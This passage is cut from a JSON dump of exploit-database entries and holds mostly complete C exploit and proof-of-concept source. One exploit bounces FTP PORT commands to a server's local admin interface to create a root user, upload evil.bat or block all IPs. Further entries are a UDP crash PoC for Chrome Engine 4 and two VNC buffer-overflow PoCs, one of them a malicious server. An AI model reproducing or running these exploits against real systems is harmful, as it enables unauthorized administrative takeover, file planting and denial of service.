quit;\r\n\r\n for(session = args->start;; session++) {\r\n if((args->end > 0) && (session >= args->end)) break;\r\n if(debug) printf(\"\\n%\"PRIu64\"\\n\\n\", session);\r\n\r\n args->session = session;\r\n //printf(\"\\n- check Session %\"PRIu64\"\\n\\n\", session);\r\n sprintf(fname, \"bug%u.txt\", (int)(time(NULL) + session));\r\n\r\n if(send_ftp(sd, \"PASV\", \"\") < 0) goto quit;\r\n ret = recv_ftp(sd, &p);\r\n if(ret < 0) goto quit;\r\n if((ret / 100) != 2) goto quit;\r\n\r\n memcpy(&peer, &args->peer, sizeof(struct sockaddr_in));\r\n peer.sin_port = htons(get_ftp_port(p, NULL));\r\n\r\n if(send_ftp(sd, \"STOR\", fname) < 0) goto quit;\r\n // receives the 1xx response for the ok\r\n\r\n /*\r\n UPLOAD HTTP REQUEST\r\n */\r\n\r\n hlen = 0;\r\n len = 0;\r\n if(exploit == 1) {\r\n // 1: deny *.*.*.*\r\n len = sprintf(buff,\r\n \"IP=*.*.*.*&Allow=0\");\r\n\r\n } else if(exploit == 2) {\r\n // 2: upload an evil file: c:\\evil.bat\r\n len = sprintf(buff,\r\n \"-----------------------------1234567890\\r\\n\"\r\n \"Content-Disposition: form-data; name='File'; filename='evil.bat'\\r\\n\" // filename is ignored\r\n \"Content-Type: application/octet-stream\\r\\n\"\r\n \"\\r\\n\"\r\n \"notepad.exe\\r\\n\"\r\n \"-----------------------------1234567890--\\r\\n\");\r\n\r\n } else if(exploit == 3) {\r\n // 3: move a file from a location to another: c:\\old.txt -> c:\\evil.bat\r\n // fast but you need to know the full real path of your folder\r\n len = sprintf(buff,\r\n \"new_path=/C:/evil.bat&original_path=/C:/old.txt\");\r\n\r\n } else if(exploit == 4) {\r\n // 4: root user\r\n len = sprintf(buff, // Access=7967\r\n \"LoginID=root&Password=root&HomeDir=/&LockInHomeDir=0&Access=8191&EmailAddress=&FullName=&RequirePasswordChange=0&AlwaysAllowLogin=1&ComboAdminType=System%%20Administrator&AdminType=2&\");\r\n\r\n } else {\r\n printf(\"\\nError: invalid test number (%d)\\n\", exploit);\r\n exit(1);\r\n }\r\n\r\n if(exploit == 1) {\r\n hlen = sprintf(http,\r\n \"POST 
/Admin/XML/Result.xml?Session=%\"PRIu64\"&Command=AddObject&Object=CServer.0.IPAccess HTTP/1.1\\r\\n\",\r\n session);\r\n\r\n } else if(exploit == 2) {\r\n hlen = sprintf(http,\r\n \"POST /?Session=%\"PRIu64\"&Command=Upload&Dir=/C:/&TransferID=2&File=evil.bat HTTP/1.1\\r\\n\"\r\n \"Content-Type: multipart/form-data; boundary=---------------------------1234567890\\r\\n\",\r\n session);\r\n\r\n } else if(exploit == 3) {\r\n hlen = sprintf(http,\r\n \"POST /?Session=%\"PRIu64\"&Command=Rename&Dir=/C: HTTP/1.1\\r\\n\",\r\n session);\r\n\r\n } else if(exploit == 4) {\r\n hlen = sprintf(http,\r\n \"POST /Admin/XML/Result.xml?Session=%\"PRIu64\"&Command=ObjectCommand&Object=COrganization.241.CreateUser HTTP/1.1\\r\\n\",\r\n session);\r\n }\r\n hlen += sprintf(http + hlen,\r\n //\"Content-Type: application/x-www-form-urlencoded; charset=UTF-8\\r\\n\"\r\n \"Host: 127.0.0.1:43958\\r\\n\"\r\n \"Content-Length: %d\\r\\n\"\r\n \"\\r\\n\",\r\n len);\r\n\r\n s = conna(&peer);\r\n send(s, http, hlen, 0);\r\n send(s, buff, len, 0);\r\n close(s);\r\n\r\n for(;;) {\r\n ret = recv_ftp(sd, &p);\r\n if(ret < 0) goto quit;\r\n if((ret / 100) == 1) continue;\r\n if((ret / 100) != 2) goto quit;\r\n break;\r\n }\r\n\r\n sprintf(buff,\r\n \"%d,%d,%d,%d,%d,%d\",\r\n 127, 0, 0, 1,\r\n (ADMIN_PORT >> 8) & 0xff, ADMIN_PORT & 0xff);\r\n if(send_ftp(sd, \"PORT\", buff) < 0) goto quit;\r\n\r\n //sprintf(buff, \"|2|::1|%d|\", ADMIN_PORT);\r\n //if(send_ftp(sd, \"EPRT\", ) < 0) goto quit;\r\n\r\n ret = recv_ftp(sd, &p);\r\n if(ret < 0) goto quit;\r\n if((ret / 100) != 2) goto quit;\r\n\r\n if(send_ftp(sd, \"RETR\", fname) < 0) goto quit;\r\n for(;;) {\r\n ret = recv_ftp(sd, &p);\r\n if(ret < 0) goto quit;\r\n if((ret / 100) == 1) continue;\r\n if(ret == 425) {\r\n printf(\"\\n\"\r\n \"Error: seems that the server isn't vulnerable:\\n\"\r\n \" %s\\n\"\r\n \"\\n\",\r\n p);\r\n goto quit;\r\n }\r\n //if((ret / 100) != 2) goto quit;\r\n // ignore errors and continue\r\n break;\r\n }\r\n\r\n if(delperm) 
{\r\n if(send_ftp(sd, \"DELE\", fname) < 0) goto quit;\r\n ret = recv_ftp(sd, &p);\r\n if(ret < 0) goto quit;\r\n if((ret / 100) != 2) delperm = 0; //goto quit; // don't check it because it's not important\r\n }\r\n }\r\n res = 0;\r\n quit:\r\n if(res < 0) printf(\"\\nError: something wrong in the communication with the server\\n\");\r\n close(sd);\r\n args->done = 1;\r\n return(res);\r\n}\r\n\r\n\r\n\r\nint delimit(u8 *data) {\r\n u8 *p;\r\n\r\n for(p = data; *p && (*p != '\\r') && (*p != '\\n'); p++);\r\n *p = 0;\r\n return(p - data);\r\n}\r\n\r\n\r\n\r\nint conna(struct sockaddr_in *peer) {\r\n struct linger ling = {1,1};\r\n int sd;\r\n\r\n sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);\r\n if(sd < 0) std_err();\r\n setsockopt(sd, SOL_SOCKET, SO_LINGER, (char *)&ling, sizeof(ling));\r\n if(connect(sd, (struct sockaddr *)peer, sizeof(struct sockaddr_in)) < 0) std_err();\r\n return(sd);\r\n}\r\n\r\n\r\n\r\nint get_ftp_port(u8 *buff, u32 *ipx) {\r\n u32 ip;\r\n int n1, n2, n3, n4, n5, n6,\r\n port;\r\n u8 *p;\r\n\r\n p = strrchr(buff, '(');\r\n if(!p) return(-1);\r\n if(sscanf(p + 1, \"%d,%d,%d,%d,%d,%d\", &n1, &n2, &n3, &n4, &n5, &n6) != 6) return(-1);\r\n ip = htonl((n1 << 24) | (n2 << 16) | (n3 << 8) | (n4));\r\n if((ip == INADDR_ANY) || (ip == INADDR_NONE)) {\r\n if(ipx) ip = *ipx;\r\n }\r\n if(ipx) *ipx = ip;\r\n port = (n5 << 8) | (n6);\r\n return(port);\r\n}\r\n\r\n\r\n\r\nint recv_ftp(int sd, u8 **rbuff) {\r\n static int buffsz = 0;\r\n static u8 *buff = NULL;\r\n int i,\r\n n,\r\n ret;\r\n\r\n do {\r\n for(i = 0;; i++) {\r\n if(i >= buffsz) {\r\n buffsz += 1024;\r\n buff = realloc(buff, buffsz + 1);\r\n if(!buff) std_err();\r\n }\r\n if(timeout(sd, 5) < 0) return(-1);\r\n if(recv(sd, buff + i, 1, 0) <= 0) return(-1);\r\n if(buff[i] == '\\n') break;\r\n }\r\n buff[i] = 0;\r\n delimit(buff);\r\n if(debug) printf(\" %s\\n\", buff);\r\n if(sscanf(buff, \"%d%n\", &ret, &n) != 1) return(-1);\r\n } while(buff[n] == '-');\r\n if(rbuff) *rbuff = buff;\r\n 
return(ret);\r\n}\r\n\r\n\r\n\r\nint send_ftp(int sd, u8 *cmd, u8 *arg) {\r\n static int buffsz = 0;\r\n static u8 *buff = NULL;\r\n int len;\r\n\r\n if(!arg) arg = \"\";\r\n len = strlen(cmd) + 1 + strlen(arg) + 2;\r\n if(len >= buffsz) {\r\n buffsz = len + 256;\r\n buff = realloc(buff, buffsz + 1);\r\n if(!buff) std_err();\r\n }\r\n len = sprintf(buff, \"%s %s\\r\\n\", cmd, arg);\r\n if(debug) printf(\"- %s\", buff);\r\n if(send(sd, buff, len, 0) <= 0) return(-1);\r\n return(len);\r\n}\r\n\r\n\r\n\r\nint timeout(int sock, int secs) {\r\n struct timeval tout;\r\n fd_set fd_read;\r\n\r\n tout.tv_sec = secs;\r\n tout.tv_usec = 0;\r\n FD_ZERO(&fd_read);\r\n FD_SET(sock, &fd_read);\r\n if(select(sock + 1, &fd_read, NULL, NULL, &tout)\r\n <= 0) return(-1);\r\n return(0);\r\n}\r\n\r\n\r\n\r\nu32 resolv(char *host) {\r\n struct hostent *hp;\r\n u32 host_ip;\r\n\r\n host_ip = inet_addr(host);\r\n if(host_ip == INADDR_NONE) {\r\n hp = gethostbyname(host);\r\n if(!hp) {\r\n printf(\"\\nError: Unable to resolv hostname (%s)\\n\", host);\r\n exit(1);\r\n } else host_ip = *(u32 *)hp->h_addr;\r\n }\r\n return(host_ip);\r\n}\r\n\r\n\r\n\r\n#ifndef WIN32\r\n void std_err(void) {\r\n perror(\"\\nError\");\r\n exit(1);\r\n }\r\n#endif\r\n\r\n\r\n\n\n# 0day.today [2018-01-03] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/18886"}, {"lastseen": "2018-04-14T13:53:34", "references": [], "description": "Exploit for windows platform in category dos / poc", "edition": 2, "reporter": "Luigi Auriemma", "published": "2012-06-27T00:00:00", "title": "Chrome Engine 4 Denial of Service 0.1", "type": "zdt", "enchantments": {"score": {"modified": "2018-04-14T13:53:34", "vector": "AV:N/AC:M/Au:M/C:N/I:P/A:N/", "value": 2.8}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2012-06-27T00:00:00", "id": "1337DAY-ID-18876", "href": "https://0day.today/exploit/description/18876", "sourceData": "----------------\r\n\r\n 
chromerda.c\r\n\r\n----------------\r\n\r\n/*\r\n by Luigi Auriemma\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <stdint.h>\r\n#include <time.h>\r\n\r\n#ifdef WIN32\r\n #include <winsock.h>\r\n #include \"winerr.h\"\r\n\r\n #define close closesocket\r\n #define sleep Sleep\r\n #define ONESEC 1000\r\n #define waitms(x) sleep(x)\r\n#else\r\n #include <unistd.h>\r\n #include <sys/socket.h>\r\n #include <sys/types.h>\r\n #include <arpa/inet.h>\r\n #include <netinet/in.h>\r\n #include <netdb.h>\r\n\r\n #define ONESEC 1\r\n #define stristr strcasestr\r\n #define stricmp strcasecmp\r\n #define waitms(x) sleep(x * 1000)\r\n#endif\r\n\r\ntypedef uint8_t u8;\r\ntypedef uint16_t u16;\r\ntypedef uint32_t u32;\r\n\r\n\r\n\r\n#define VER \"0.1\"\r\n#define PORT 27632\r\n#define BUFFSZ 1400\r\n\r\n\r\n\r\nvoid chrome_hash(u8 *data, int len);\r\nint udp_sock(void);\r\nint putxx(u8 *data, u32 num, int bits);\r\nu32 resolv(char *host);\r\nvoid std_err(void);\r\n\r\n\r\n\r\nint main(int argc, char *argv[]) {\r\n struct sockaddr_in peer;\r\n int sd;\r\n u16 port = PORT;\r\n u8 buff[BUFFSZ],\r\n *host,\r\n *p;\r\n\r\n#ifdef WIN32\r\n WSADATA wsadata;\r\n WSAStartup(MAKEWORD(1,0), &wsadata);\r\n#endif\r\n\r\n setbuf(stdout, NULL);\r\n\r\n fputs(\"\\n\"\r\n \"Chrome Engine 4 Denial of Service \"VER\"\\n\"\r\n \"by Luigi Auriemma\\n\"\r\n \"e-mail: [email\u00a0protected]\\n\"\r\n \"web: aluigi.org\\n\"\r\n \"\\n\", stdout);\r\n\r\n if(argc < 2) {\r\n printf(\"\\n\"\r\n \"Usage: %s <host> [port(%d)]>\\n\"\r\n \"\\n\", argv[0], port);\r\n exit(1);\r\n }\r\n host = argv[1];\r\n if(argc > 2) port = atoi(argv[2]);\r\n\r\n peer.sin_addr.s_addr = resolv(host);\r\n peer.sin_port = htons(port);\r\n peer.sin_family = AF_INET;\r\n\r\n printf(\"- target %s : %hu\\n\",\r\n inet_ntoa(peer.sin_addr), port);\r\n\r\n sd = udp_sock();\r\n\r\n p = buff;\r\n p += putxx(p, 28, 8); // other types of packets: 23, 38 (nop), 64, 67\r\n p += putxx(p, (-0x6f) - 5, 32); 
// this is caused by wrong crc\r\n //p += putcc(p, 'A', (BUFFSZ - 2) - 5); // not needed since the crash is in malloc\r\n p += putxx(p, 0, 16); // the WRONG crc\r\n if(sendto(sd, buff, p - buff, 0, (struct sockaddr *)&peer, sizeof(struct sockaddr_in))\r\n < 0) std_err();\r\n fputc('.', stdout);\r\n\r\n printf(\"\\n- done, check the server manually\\n\");\r\n close(sd);\r\n return(0);\r\n}\r\n\r\n\r\n\r\n// the correct hash function plus the automatic adjusting of the size value\r\nvoid chrome_hash(u8 *data, int len) {\r\n int i;\r\n u16 crc = 1735;\r\n\r\n putxx(data + 1, len - 5, 32);\r\n for(i = 0; i < len; i++) {\r\n crc += (signed char)data[i];\r\n }\r\n data[i] = crc;\r\n data[i+1] = crc >> 8;\r\n}\r\n\r\n\r\n\r\nint udp_sock(void) {\r\n static struct linger ling = {1,1};\r\n static int on = 1;\r\n int sd;\r\n\r\n sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);\r\n if(sd < 0) std_err();\r\n setsockopt(sd, SOL_SOCKET, SO_LINGER, (char *)&ling, sizeof(ling));\r\n setsockopt(sd, SOL_SOCKET, SO_BROADCAST, (char *)&on, sizeof(on));\r\n return(sd);\r\n}\r\n\r\n\r\n\r\nint putxx(u8 *data, u32 num, int bits) {\r\n int i,\r\n bytes;\r\n\r\n bytes = bits >> 3;\r\n for(i = 0; i < bytes; i++) {\r\n //data[i] = (num >> ((bytes - 1 - i) << 3));\r\n data[i] = (num >> (i << 3));\r\n }\r\n return(bytes);\r\n}\r\n\r\n\r\n\r\nu32 resolv(char *host) {\r\n struct hostent *hp;\r\n u32 host_ip;\r\n\r\n host_ip = inet_addr(host);\r\n if(host_ip == INADDR_NONE) {\r\n hp = gethostbyname(host);\r\n if(!hp) {\r\n printf(\"\\nError: Unable to resolv hostname (%s)\\n\", host);\r\n exit(1);\r\n } else host_ip = *(u32 *)hp->h_addr;\r\n }\r\n return(host_ip);\r\n}\r\n\r\n\r\n\r\n#ifndef WIN32\r\n void std_err(void) {\r\n perror(\"\\nError\");\r\n exit(1);\r\n }\r\n#endif\r\n\r\n\r\n----------------\r\n winerr.h\r\n\r\n----------------\r\n\r\n/*\r\n Header file used for manage errors in Windows\r\n It support socket and errno too\r\n (this header replace the previous 
sock_errX.h)\r\n*/\r\n\r\n#include <string.h>\r\n#include <errno.h>\r\n\r\n\r\n\r\nvoid std_err(void) {\r\n char *error;\r\n\r\n switch(WSAGetLastError()) {\r\n case 10004: error = \"Interrupted system call\"; break;\r\n case 10009: error = \"Bad file number\"; break;\r\n case 10013: error = \"Permission denied\"; break;\r\n case 10014: error = \"Bad address\"; break;\r\n case 10022: error = \"Invalid argument (not bind)\"; break;\r\n case 10024: error = \"Too many open files\"; break;\r\n case 10035: error = \"Operation would block\"; break;\r\n case 10036: error = \"Operation now in progress\"; break;\r\n case 10037: error = \"Operation already in progress\"; break;\r\n case 10038: error = \"Socket operation on non-socket\"; break;\r\n case 10039: error = \"Destination address required\"; break;\r\n case 10040: error = \"Message too long\"; break;\r\n case 10041: error = \"Protocol wrong type for socket\"; break;\r\n case 10042: error = \"Bad protocol option\"; break;\r\n case 10043: error = \"Protocol not supported\"; break;\r\n case 10044: error = \"Socket type not supported\"; break;\r\n case 10045: error = \"Operation not supported on socket\"; break;\r\n case 10046: error = \"Protocol family not supported\"; break;\r\n case 10047: error = \"Address family not supported by protocol family\"; break;\r\n case 10048: error = \"Address already in use\"; break;\r\n case 10049: error = \"Can't assign requested address\"; break;\r\n case 10050: error = \"Network is down\"; break;\r\n case 10051: error = \"Network is unreachable\"; break;\r\n case 10052: error = \"Net dropped connection or reset\"; break;\r\n case 10053: error = \"Software caused connection abort\"; break;\r\n case 10054: error = \"Connection reset by peer\"; break;\r\n case 10055: error = \"No buffer space available\"; break;\r\n case 10056: error = \"Socket is already connected\"; break;\r\n case 10057: error = \"Socket is not connected\"; break;\r\n case 10058: error = \"Can't send after socket 
shutdown\"; break;\r\n case 10059: error = \"Too many references, can't splice\"; break;\r\n case 10060: error = \"Connection timed out\"; break;\r\n case 10061: error = \"Connection refused\"; break;\r\n case 10062: error = \"Too many levels of symbolic links\"; break;\r\n case 10063: error = \"File name too long\"; break;\r\n case 10064: error = \"Host is down\"; break;\r\n case 10065: error = \"No Route to Host\"; break;\r\n case 10066: error = \"Directory not empty\"; break;\r\n case 10067: error = \"Too many processes\"; break;\r\n case 10068: error = \"Too many users\"; break;\r\n case 10069: error = \"Disc Quota Exceeded\"; break;\r\n case 10070: error = \"Stale NFS file handle\"; break;\r\n case 10091: error = \"Network SubSystem is unavailable\"; break;\r\n case 10092: error = \"WINSOCK DLL Version out of range\"; break;\r\n case 10093: error = \"Successful WSASTARTUP not yet performed\"; break;\r\n case 10071: error = \"Too many levels of remote in path\"; break;\r\n case 11001: error = \"Host not found\"; break;\r\n case 11002: error = \"Non-Authoritative Host not found\"; break;\r\n case 11003: error = \"Non-Recoverable errors: FORMERR, REFUSED, NOTIMP\"; break;\r\n case 11004: error = \"Valid name, no data record of requested type\"; break;\r\n default: error = strerror(errno); break;\r\n }\r\n fprintf(stderr, \"\\nError: %s\\n\", error);\r\n exit(1);\r\n}\r\n\r\n\n\n# 0day.today [2018-04-14] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/18876"}, {"lastseen": "2018-01-11T01:21:29", "references": [], "description": "Exploit for unknown platform in category dos / poc", "edition": 2, "reporter": "Luigi Auriemma", "published": "2006-04-04T00:00:00", "title": "[email\u00a0protected] <= 1.0.1 client Log::ReallyPrint Buffer Overflow PoC", "type": "zdt", "enchantments": {"score": {"modified": "2018-01-11T01:21:29", "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N/", "value": 5.5}}, "bulletinFamily": "exploit", "cvelist": [], 
"modified": "2006-04-04T00:00:00", "id": "1337DAY-ID-6124", "href": "https://0day.today/exploit/description/6124", "sourceData": "=============================================================\r\n[email\u00a0protected] <= 1.0.1 client Log::ReallyPrint Buffer Overflow PoC\r\n=============================================================\r\n\r\n\r\n\r\n/*\r\n\r\nby Luigi Auriemma\r\n\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <time.h>\r\n\r\n#ifdef WIN32\r\n #include <winsock.h>\r\n/*\r\n Header file used for manage errors in Windows\r\n It support socket and errno too\r\n (this header replace the previous sock_errX.h)\r\n*/\r\n\r\n#include <string.h>\r\n#include <errno.h>\r\n\r\nvoid std_err(void) {\r\n char *error;\r\n\r\n switch(WSAGetLastError()) {\r\n case 10004: error = \"Interrupted system call\"; break;\r\n case 10009: error = \"Bad file number\"; break;\r\n case 10013: error = \"Permission denied\"; break;\r\n case 10014: error = \"Bad address\"; break;\r\n case 10022: error = \"Invalid argument (not bind)\"; break;\r\n case 10024: error = \"Too many open files\"; break;\r\n case 10035: error = \"Operation would block\"; break;\r\n case 10036: error = \"Operation now in progress\"; break;\r\n case 10037: error = \"Operation already in progress\"; break;\r\n case 10038: error = \"Socket operation on non-socket\"; break;\r\n case 10039: error = \"Destination address required\"; break;\r\n case 10040: error = \"Message too long\"; break;\r\n case 10041: error = \"Protocol wrong type for socket\"; break;\r\n case 10042: error = \"Bad protocol option\"; break;\r\n case 10043: error = \"Protocol not supported\"; break;\r\n case 10044: error = \"Socket type not supported\"; break;\r\n case 10045: error = \"Operation not supported on socket\"; break;\r\n case 10046: error = \"Protocol family not supported\"; break;\r\n case 10047: error = \"Address family not supported by protocol family\"; break;\r\n case 10048: error = 
\"Address already in use\"; break;\r\n case 10049: error = \"Can't assign requested address\"; break;\r\n case 10050: error = \"Network is down\"; break;\r\n case 10051: error = \"Network is unreachable\"; break;\r\n case 10052: error = \"Net dropped connection or reset\"; break;\r\n case 10053: error = \"Software caused connection abort\"; break;\r\n case 10054: error = \"Connection reset by peer\"; break;\r\n case 10055: error = \"No buffer space available\"; break;\r\n case 10056: error = \"Socket is already connected\"; break;\r\n case 10057: error = \"Socket is not connected\"; break;\r\n case 10058: error = \"Can't send after socket shutdown\"; break;\r\n case 10059: error = \"Too many references, can't splice\"; break;\r\n case 10060: error = \"Connection timed out\"; break;\r\n case 10061: error = \"Connection refused\"; break;\r\n case 10062: error = \"Too many levels of symbolic links\"; break;\r\n case 10063: error = \"File name too long\"; break;\r\n case 10064: error = \"Host is down\"; break;\r\n case 10065: error = \"No Route to Host\"; break;\r\n case 10066: error = \"Directory not empty\"; break;\r\n case 10067: error = \"Too many processes\"; break;\r\n case 10068: error = \"Too many users\"; break;\r\n case 10069: error = \"Disc Quota Exceeded\"; break;\r\n case 10070: error = \"Stale NFS file handle\"; break;\r\n case 10091: error = \"Network SubSystem is unavailable\"; break;\r\n case 10092: error = \"WINSOCK DLL Version out of range\"; break;\r\n case 10093: error = \"Successful WSASTARTUP not yet performed\"; break;\r\n case 10071: error = \"Too many levels of remote in path\"; break;\r\n case 11001: error = \"Host not found\"; break;\r\n case 11002: error = \"Non-Authoritative Host not found\"; break;\r\n case 11003: error = \"Non-Recoverable errors: FORMERR, REFUSED, NOTIMP\"; break;\r\n case 11004: error = \"Valid name, no data record of requested type\"; break;\r\n default: error = strerror(errno); break;\r\n }\r\n fprintf(stderr, 
\"\\nError: %s\\n\", error);\r\n exit(1);\r\n}\r\n\r\n #define close closesocket\r\n#else\r\n #include <unistd.h>\r\n #include <sys/socket.h>\r\n #include <sys/types.h>\r\n #include <arpa/inet.h>\r\n #include <netinet/in.h>\r\n #include <netdb.h>\r\n#endif\r\n\r\n\r\n\r\n#define VER \"0.1\"\r\n#define PORT 5900\r\n#define BOFSZ 1024\r\n#define HEAD \"RFB 003.006\\n\"\r\n\r\n\r\n\r\nvoid std_err(void);\r\n\r\n\r\n\r\nint main(int argc, char *argv[]) {\r\n struct sockaddr_in peerl;\r\n u_int seed;\r\n int sdl,\r\n sd,\r\n len,\r\n on = 1,\r\n psz;\r\n u_char buff[4096];\r\n\r\n#ifdef WIN32\r\n WSADATA wsadata;\r\n WSAStartup(MAKEWORD(1,0), &wsadata);\r\n#endif\r\n\r\n setbuf(stdout, NULL);\r\n\r\n fputs(\"\\n\"\r\n \"[email\u00a0protected] <= 1.0.1 client Log::ReallyPrint buffer-overflow \"VER\"\\n\"\r\n \"by Luigi Auriemma\\n\"\r\n \"e-mail: [email\u00a0protected]\\n\"\r\n \"web: http://aluigi.altervista.org\\n\"\r\n \"\\n\", stdout);\r\n\r\n peerl.sin_addr.s_addr = INADDR_ANY;\r\n peerl.sin_port = htons(PORT);\r\n peerl.sin_family = AF_INET;\r\n\r\n printf(\"- bind port %hu\\n\", PORT);\r\n sdl = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);\r\n if(sdl < 0) std_err();\r\n if(setsockopt(sdl, SOL_SOCKET, SO_REUSEADDR, (char *)&on, sizeof(on))\r\n < 0) std_err();\r\n if(bind(sdl, (struct sockaddr *)&peerl, sizeof(peerl))\r\n < 0) std_err();\r\n if(listen(sdl, SOMAXCONN)\r\n < 0) std_err();\r\n\r\n psz = sizeof(peerl);\r\n seed = time(NULL);\r\n\r\n fputs(\"- clients:\\n\", stdout);\r\n for(;;) {\r\n sd = accept(sdl, (struct sockaddr *)&peerl, &psz);\r\n if(sd < 0) std_err();\r\n\r\n printf(\" %s:%hu\\n\",\r\n inet_ntoa(peerl.sin_addr), ntohs(peerl.sin_port));\r\n\r\n // this is only a simple PoC, so no threads and no checks\r\n if(send(sd, HEAD, sizeof(HEAD) - 1, 0) <= 0) goto quit;\r\n\r\n len = recv(sd, buff, 12, 0); // no need to check real recv\r\n if(len <= 0) goto quit;\r\n\r\n *(u_int *)buff = htonl(0); // connection failed\r\n *(u_int *)(buff + 4) = htonl(BOFSZ); 
// size of the error\r\n memset(buff + 8, 'A', BOFSZ); // error\r\n if(send(sd, buff, 8 + BOFSZ, 0) <= 0) goto quit;\r\n\r\nquit:\r\n close(sd);\r\n }\r\n\r\n close(sdl);\r\n return(0);\r\n}\r\n\r\n\r\n\r\n#ifndef WIN32\r\n void std_err(void) {\r\n perror(\"\\nError\");\r\n exit(1);\r\n }\r\n#endif\r\n\r\n\r\n\n# 0day.today [2018-01-10] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/6124"}, {"lastseen": "2018-04-06T03:35:48", "references": [], "description": "Exploit for unknown platform in category dos / poc", "edition": 2, "reporter": "Luigi Auriemma", "published": "2006-04-04T00:00:00", "title": "[email\u00a0protected] <= 1.0.1 VNCLog::ReallyPrint Remote Buffer Overflow PoC", "type": "zdt", "enchantments": {"score": {"modified": "2018-04-06T03:35:48", "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N/", "value": 5.5}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2006-04-04T00:00:00", "id": "1337DAY-ID-6123", "href": "https://0day.today/exploit/description/6123", "sourceData": "================================================================\r\n[email\u00a0protected] <= 1.0.1 VNCLog::ReallyPrint Remote Buffer Overflow PoC\r\n================================================================\r\n\r\n\r\n\r\n\r\n/*\r\n\r\nby Luigi Auriemma\r\n\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <time.h>\r\n\r\n#ifdef WIN32\r\n #include <winsock.h>\r\n/*\r\n Header file used for manage errors in Windows\r\n It support socket and errno too\r\n (this header replace the previous sock_errX.h)\r\n*/\r\n\r\n#include <string.h>\r\n#include <errno.h>\r\n\r\n\r\n\r\nvoid std_err(void) {\r\n char *error;\r\n\r\n switch(WSAGetLastError()) {\r\n case 10004: error = \"Interrupted system call\"; break;\r\n case 10009: error = \"Bad file number\"; break;\r\n case 10013: error = \"Permission denied\"; break;\r\n case 10014: error = \"Bad address\"; break;\r\n case 10022: error = \"Invalid argument (not 
bind)\"; break;\r\n case 10024: error = \"Too many open files\"; break;\r\n case 10035: error = \"Operation would block\"; break;\r\n case 10036: error = \"Operation now in progress\"; break;\r\n case 10037: error = \"Operation already in progress\"; break;\r\n case 10038: error = \"Socket operation on non-socket\"; break;\r\n case 10039: error = \"Destination address required\"; break;\r\n case 10040: error = \"Message too long\"; break;\r\n case 10041: error = \"Protocol wrong type for socket\"; break;\r\n case 10042: error = \"Bad protocol option\"; break;\r\n case 10043: error = \"Protocol not supported\"; break;\r\n case 10044: error = \"Socket type not supported\"; break;\r\n case 10045: error = \"Operation not supported on socket\"; break;\r\n case 10046: error = \"Protocol family not supported\"; break;\r\n case 10047: error = \"Address family not supported by protocol family\"; break;\r\n case 10048: error = \"Address already in use\"; break;\r\n case 10049: error = \"Can't assign requested address\"; break;\r\n case 10050: error = \"Network is down\"; break;\r\n case 10051: error = \"Network is unreachable\"; break;\r\n case 10052: error = \"Net dropped connection or reset\"; break;\r\n case 10053: error = \"Software caused connection abort\"; break;\r\n case 10054: error = \"Connection reset by peer\"; break;\r\n case 10055: error = \"No buffer space available\"; break;\r\n case 10056: error = \"Socket is already connected\"; break;\r\n case 10057: error = \"Socket is not connected\"; break;\r\n case 10058: error = \"Can't send after socket shutdown\"; break;\r\n case 10059: error = \"Too many references, can't splice\"; break;\r\n case 10060: error = \"Connection timed out\"; break;\r\n case 10061: error = \"Connection refused\"; break;\r\n case 10062: error = \"Too many levels of symbolic links\"; break;\r\n case 10063: error = \"File name too long\"; break;\r\n case 10064: error = \"Host is down\"; break;\r\n case 10065: error = \"No Route to Host\"; 
break;\r\n case 10066: error = \"Directory not empty\"; break;\r\n case 10067: error = \"Too many processes\"; break;\r\n case 10068: error = \"Too many users\"; break;\r\n case 10069: error = \"Disc Quota Exceeded\"; break;\r\n case 10070: error = \"Stale NFS file handle\"; break;\r\n case 10091: error = \"Network SubSystem is unavailable\"; break;\r\n case 10092: error = \"WINSOCK DLL Version out of range\"; break;\r\n case 10093: error = \"Successful WSASTARTUP not yet performed\"; break;\r\n case 10071: error = \"Too many levels of remote in path\"; break;\r\n case 11001: error = \"Host not found\"; break;\r\n case 11002: error = \"Non-Authoritative Host not found\"; break;\r\n case 11003: error = \"Non-Recoverable errors: FORMERR, REFUSED, NOTIMP\"; break;\r\n case 11004: error = \"Valid name, no data record of requested type\"; break;\r\n default: error = strerror(errno); break;\r\n }\r\n fprintf(stderr, \"\\nError: %s\\n\", error);\r\n exit(1);\r\n}\r\n\r\n #define close closesocket\r\n #define ONESEC 1000\r\n#else\r\n #include <unistd.h>\r\n #include <sys/socket.h>\r\n #include <sys/types.h>\r\n #include <arpa/inet.h>\r\n #include <netinet/in.h>\r\n #include <netdb.h>\r\n\r\n #define ONESEC 1\r\n#endif\r\n\r\n\r\n\r\n#define VER \"0.1\"\r\n#define PORT 5800\r\n#define BOFSZ 1024\r\n\r\n\r\n\r\nint create_rand_string(u_char *data, int len, u_int *seed);\r\nu_int resolv(char *host);\r\nvoid std_err(void);\r\n\r\n\r\n\r\nint main(int argc, char *argv[]) {\r\n struct sockaddr_in peer;\r\n u_int seed;\r\n int sd,\r\n i,\r\n len;\r\n u_short port = PORT;\r\n u_char buff[4096];\r\n\r\n#ifdef WIN32\r\n WSADATA wsadata;\r\n WSAStartup(MAKEWORD(1,0), &wsadata);\r\n#endif\r\n\r\n setbuf(stdout, NULL);\r\n\r\n fputs(\"\\n\"\r\n \"U[email\u00a0protected] <= 1.0.1 VNCLog::ReallyPrint bug \"VER\"\\n\"\r\n \"by Luigi Auriemma\\n\"\r\n \"e-mail: [email\u00a0protected]\\n\"\r\n \"web: http://aluigi.altervista.org\\n\"\r\n \"\\n\", stdout);\r\n\r\n if(argc < 2) {\r\n 
